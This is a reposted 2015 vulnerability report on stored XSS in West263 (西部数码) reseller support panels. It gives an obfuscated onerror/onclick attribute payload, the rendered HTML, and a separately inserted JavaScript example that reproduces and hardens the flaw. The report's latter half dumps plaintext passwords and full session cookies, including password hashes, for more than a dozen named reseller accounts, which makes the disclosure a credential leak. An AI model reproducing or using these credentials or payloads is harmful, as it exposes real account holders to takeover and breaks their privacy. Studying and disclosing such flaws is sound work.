

West263 (西部数码) stored XSS affects some resellers - Website Security

Source: 自学PHP网 (zixuephp.com)    Date: 2015-04-16 23:15    Author: (not given)    Views: (not given)


Search Baidu for 西部数码代理 (West263 resellers) and open any one of the reseller sites.

Register a user account and submit a support question.

Intercept the request and change the uploadFileName parameter to:
xxx.jpg"onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"
(the String.fromCharCode sequence decodes to alert(1))

In the ticket tracking page (问题跟踪处理) the submitted value is rendered as:

<a href="xxx.jpg" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))" "="" target="_blank"><img src="xxx.jpg"onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"" alt="点击看大图" border="0" height="58" width="392"></a>

The double quotes are filtered inside the <img> tag but not inside the <a> tag, so the injected attribute survives there. An <a> element never fires onerror, so change onerror to onclick and the payload runs as soon as the link is clicked.

A second finding: when a reseller logs in through the official site, http://www.west263.com/, the double quotes inside <img> are not filtered either, so the XSS fires with no user interaction at all.
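The rendering problem described above, as an added example that is not part of the original write-up or of West263's code. It models the markup quoted above, shows why stripping quotes in only one of the two tags still leaves an injectable attribute, and renders the same value safely. The function names, the allow-list pattern and the reconstruction of the panel's partial filter are assumptions made for the illustration.

```javascript
// Added example, not code from the write-up or from West263. Function names
// and the reconstruction of the panel's quote filter are assumptions.

// Payloads from the write-up. The first only fires where quotes survive in
// the <img> tag; the second is the onclick variant that fires from the <a>.
const PAYLOAD_ONERROR = 'xxx.jpg"onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"';
const PAYLOAD_ONCLICK = 'xxx.jpg"onclick="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"';

// Assumed reconstruction of the vulnerable panel: the <img> src has its
// double quotes removed, but the <a> href is inserted unchanged. A browser
// treats `"onclick="..."` right after a closed attribute value as a new
// attribute, which is exactly what the quoted output shows for the <a>.
function renderAttachmentVulnerable(fileName) {
  const imgName = fileName.replace(/"/g, '');
  return '<a href="' + fileName + '" target="_blank">' +
         '<img src="' + imgName + '" alt="点击看大图" border="0"></a>';
}

// Hardened: encode every character that can end or alter an attribute value,
// in every attribute context, not just one tag. '&' is encoded too so that
// a stored "&quot;" cannot be turned back into a quote on output.
function escapeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// An upload name should also be allow-listed before it is ever stored:
// quotes, spaces, slashes and angle brackets have no business in it.
const SAFE_FILENAME = /^[A-Za-z0-9_.-]{1,255}$/;
function isSafeFileName(fileName) {
  return SAFE_FILENAME.test(fileName);
}

function renderAttachmentSafe(fileName) {
  const v = escapeAttr(fileName);
  return '<a href="' + v + '" target="_blank">' +
         '<img src="' + v + '" alt="点击看大图" border="0"></a>';
}

// Heuristic check for tests: does an on*= handler appear where a browser
// would parse it as an attribute (after whitespace or a closing quote)?
// Good enough for unit-testing a renderer, not a replacement for a parser.
function hasInjectedHandler(html) {
  return /(?:^|[\s"'])on[a-z]+\s*=/i.test(html);
}

for (const p of [PAYLOAD_ONERROR, PAYLOAD_ONCLICK]) {
  console.log('vulnerable renderer injected:', hasInjectedHandler(renderAttachmentVulnerable(p)));
  console.log('hardened renderer injected:  ', hasInjectedHandler(renderAttachmentSafe(p)));
  console.log('accepted by allow-list:      ', isSafeFileName(p));
}
```

The two defences are deliberately independent: the allow-list stops the value from ever being stored, and the output encoding protects the page even when some other code path (for example the official-site login flow mentioned above) renders a value that was stored before the allow-list existed.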
In addition, this system stores the username and the password, protected by nothing more than an MD5 hash, directly in the cookie, and given how the server validates them a captured cookie never expires.

Once I had the cookies I did not go any further. Some of the reseller data obtained during testing:
 
Account: rulezhuji
Password: ielsndd

Account: xingluren
Password: admin888@

Account: cfan0329
Password: ver0330

Account: xufeng
Password: 121325815

Account: soowo
Password: 218891

Account: cddgg (captured cookie follows):
 
opt_orderby=desc; Q%5Flastime=2014%2D05%2D07 17%3A13%3A38; secpass=93849c4f002a23f4ce34a5b3138f9484; ASPSESSIONIDACCBRSDC=EGFFCFLABNCOKEMFFPIPIGDE; ASPSESSIONIDACDBTSCC=KILLBEKACJLMGDIGDGCGLPGP; ASPSESSIONIDCCCDSQDD=DGBPDDMABFCJMEJGIJBNLHGJ; ASPSESSIONIDAACCQSCD=GCAADENAEIACCPJHALEKKDCO; onliner_zdfq953501=0; menu_index=2; ASPSESSIONIDACDBRSDC=PFJHHKNAIKMHLICCENHAOEPM; ASPSESSIONIDCABBRTDD=KJHMHLNAOMLGBHBAEFGILEJL; olduser%5F=yes; ASPSESSIONIDACBBRTCD=LJJJOHNACCJHMKDILLDIPPAB; ASPSESSIONIDCCAASTDC=DIDBANOAHFCOGLHKIHCDOLHA; west263%5Fusername=swh2011; cuser%5Fname=cddgg; cuser%5Fpwd=19d9efebf18ed04b; cpanel%5Fpriusername=swh2011; cpanel%5Fpriuserpass=9a700f06568631ba; 53kf_953501_keyword=; kf_953501_keyword_ok=1; Hm_lvt_c7b8362196faf0c1203a46aa4bd2fe82=1399123150,1399336085,1399428994,1399433415; Hm_lpvt_c7b8362196faf0c1203a46aa4bd2fe82=1399452131
 
 
 
Account: snyywzm (captured cookie follows):
 
cpanel%5Fpriuserpass=; cpanel%5Fpriusername=; west263%5Fusername=snyywzm; cuser%5Fname=snyywzm; cuser%5Fpwd=ac86d6823a2603d6; Q%5Flastime=2014%2D05%2D07 16%3A51%3A32; s_pers=%20s_vnum%3D1401414603238%2526vn%253D1%7C1401414603238%3B%20s_fid%3D07CE3F9496014103-0CB3AE4162151D56%7C1461981066234%3B%20s_nr%3D1398822666241%7C1401414666241%3B%20s_invisit%3Dtrue%7C1398824466249%3B; secpass=e8503c7db8ca023e9d629253a14faff5; ASPSESSIONIDACCBRSDC=MBFFCFLAEJKLJFLNGMFFGAHA; ASPSESSIONIDAAAAQTDD=AGHDGDKAGMNIEMDLFNJINPKJ; onliner_zdfq953501=0; olduser%5F=yes; ASPSESSIONIDCCDATSDD=LGPLCJLAPGLNNPIEFNKEGCLB; 53kf_953501_keyword=http%3A//www.west.cn/SetInManager/; kf_953501_keyword_ok=1; cpanel%5Fpriuserpass=ac86d6823a2603d6; cpanel%5Fpriusername=snyywzm; ASPSESSIONIDAACCQSCD=INPPCENAAANEHCAELEEGKFPJ; ASPSESSIONIDCABBTTCD=PBOLHBNADFKHPFPIDBBBNMHG; ASPSESSIONIDACDBRSDC=IAJHHKNAGMIOMAJLEAGIOMJM; ASPSESSIONIDCADCRTCD=ABILJGOAFDFIOJCBMDDOEBKK; cuser%5Fpwd=ac86d6823a2603d6; cuser%5Fname=snyywzm; west263%5Fusername=snyywzm; ASPSESSIONIDCABBRTDD=DLFOHLNALLCPJPDNJIHMOIJO; Hm_lvt_c7b8362196faf0c1203a46aa4bd2fe82=1399346428,1399354692,1399357225,1399423079; Hm_lpvt_c7b8362196faf0c1203a46aa4bd2fe82=1399451737
 
 
 
Account: imatao (captured cookie follows):
 
opt_orderby=desc; idcroom=11; cpanel%5Fpriusername=; cpanel%5Fpriuserpass=; cuser%5Fpwd=567930474823c072; west263%5Fusername=imatao; cuser%5Fname=imatao; Q%5Flastime=2014%2D05%2D07 16%3A50%3A39; istixing%5Ffely%2Ecc=true; s_pers=%20s_fid%3D4BE7100DCA992FF5-24E4F3A89BB2F6C2%7C1461669310779%3B%20s_nr%3D1398510910789%7C1401102910789%3B%20s_vnum%3D1401102910796%2526vn%253D1%7C1401102910796%3B%20s_invisit%3Dtrue%7C1398512710796%3B; istixing%5Fxn%2D%2Dmkrq8ad0uk46a%2Ecom=true; auto%5Fspoolid=3177; secpass=645e8d49362e30ac262080f25b88cbe2; ASPSESSIONIDAAAAQTDD=NJOHHDKABNPMLEOBMOABNLAD; onliner_zdfq953501=0; ASPSESSIONIDACCBRSDC=DFFFCFLAKKDGCMNCNAOJHLJJ; ASPSESSIONIDAACCQSCD=NLPPCENANBFBOKFCAOCEFHAG; ASPSESSIONIDACDBTSCC=BJKLBEKAPADNIEIEMLPBCPPH; ASPSESSIONIDACBBRTCD=GBIJOHNAEDKJDAHBEFIKDBAE; ASPSESSIONIDACDBRSDC=MMIHHKNANJHBCPAHNCJPDIMC; ASPSESSIONIDCABBRTDD=LGPLHLNABLJFIHJPGMEJMBFM; cpanel%5Fpriuserpass=8b5758820a4885dc; cpanel%5Fpriusername=yc122173556; west263%5Fusername=yc122173556; menu_index=2; 53kf_953501_keyword=; kf_953501_keyword_ok=1; cuser%5Fpwd=8b5758820a4885dc; cuser%5Fname=yc122173556; arp_scroll_switch=1; Hm_lvt_c7b8362196faf0c1203a46aa4bd2fe82=1399079373,1399100400,1399163843,1399428838; Hm_lpvt_c7b8362196faf0c1203a46aa4bd2fe82=1399451775; arp_scroll_position=0
 
 
 
Account: yc122173556
Password: yc19890304

Account: bjfic
Password: 123456bj

Account: akbkcklxj
Password: liangjun123.com

Account: god
Password: 51...win

Account: westshenfu
Password: eash805

Account: liguangda
Password: mymima2012
 
Being a responsible person, I reported this to WooYun (乌云) as soon as I found it. Please notify the resellers listed above to change their passwords.
 
 
Fix:
Fix the XSS, and then change the user verification mechanism as well.
